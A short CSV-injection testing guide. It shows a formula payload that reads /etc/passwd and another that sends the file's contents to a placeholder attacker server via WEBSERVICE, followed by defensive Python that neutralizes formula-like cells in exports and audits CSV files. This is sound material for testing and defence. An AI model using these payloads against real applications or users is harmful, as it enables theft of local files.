CSV Injection

If an application takes input in parameters whose data can later be exported to a CSV file, we can test those parameters for CSV Injection.

First, inject the following into each of the parameters:

='file:///etc/passwd'#$passwd.A1

Export the CSV and check whether the contents of /etc/passwd are listed in any of the fields.

With the following payload, the contents of the file on the victim's system could be sent to a malicious server for exfiltration:

=WEBSERVICE(CONCATENATE("http://[ATTACKER_SERVER]:[PORT]/",('file:///etc/passwd'#$passwd.A1)))
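On the export side, the mitigation is to keep the spreadsheet from evaluating such cells. The sketch below is an added example, not code from the original page: following OWASP's CSV injection guidance, it prefixes formula-like cells with a single quote, quotes every field, and can audit an existing export. The function names and sample rows are constructed for illustration.

```python
import csv
import io

FORMULA_START = ("=", "+", "-", "@")

def is_formula_like(text):
    """True if a spreadsheet could evaluate this cell instead of showing it."""
    try:
        float(text)
        return False  # plain number such as -3: nothing to evaluate
    except ValueError:
        pass
    # Leading tab/CR are listed by OWASP as triggers; treating leading
    # spaces as ignorable is a conservative assumption of this example.
    return text[:1] in ("\t", "\r") or text.lstrip()[:1] in FORMULA_START

def neutralize_cell(value):
    """Return the text to write for one cell, forced to display as a literal."""
    text = "" if value is None else str(value)
    return "'" + text if is_formula_like(text) else text

def export_csv(rows):
    """Serialize rows to CSV text with every cell neutralized and quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL)
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()

def find_formula_cells(csv_text):
    """Audit an existing export: list (row, column, value) of risky cells."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text)), start=1):
        for c, cell in enumerate(row, start=1):
            if is_formula_like(cell):
                hits.append((r, c, cell))
    return hits

# Constructed sample rows; one comment field holds the page's first test string.
SAMPLE_ROWS = [
    ["id", "name", "comment"],
    [1, "alice", "looks fine"],
    [2, "bob", "='file:///etc/passwd'#$passwd.A1"],
    [-3, "carol", "  @SUM(1,1)"],
]

if __name__ == "__main__":
    raw = io.StringIO()
    csv.writer(raw).writerows(SAMPLE_ROWS)
    print("unsafe export:", find_formula_cells(raw.getvalue()))
    print("neutralized export:", find_formula_cells(export_csv(SAMPLE_ROWS)))
```

The prefix alters the stored text, so apply it when generating the export rather than when saving the input. How the leading quote is displayed depends on the spreadsheet application that opens the file.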
